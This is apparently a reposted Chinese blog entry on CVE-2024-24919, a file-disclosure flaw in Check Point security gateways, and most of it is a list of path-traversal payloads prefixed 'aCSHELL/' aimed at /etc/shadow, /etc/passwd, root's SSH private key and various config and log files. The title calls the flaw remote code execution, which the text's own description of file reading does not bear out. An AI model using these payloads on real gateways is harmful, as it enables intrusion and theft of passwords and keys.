CVE-2024-24919是一个高严重性信息泄露漏洞,允许攻击者远程读取 Check Point 安全网关上的任意文件。此漏洞可被用来窃取敏感信息,例如密码和配置文件。
'aCSHELL/../../../../../../../../../../../etc/passwd',
'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
'aCSHELL/../../../../../../../../../../../var/log/syslog',
'aCSHELL/../../../../../../../../../../../var/log/auth.log',
'aCSHELL/../../../../../../../../../../../var/log/messages',
'aCSHELL/../../../../../../../../../../../etc/group',
'aCSHELL/../../../../../../../../../../../etc/shadow',
'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
'aCSHELL/../../../../../../../../../../../etc/hostname',
'aCSHELL/../../../../../../../../../../../etc/hosts',
'aCSHELL/../../../../../../../../../../../etc/resolv.conf'
原文始发于微信公众号(TtTeam):CVE-2024-24919 Check Point 安全网关 RCE
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论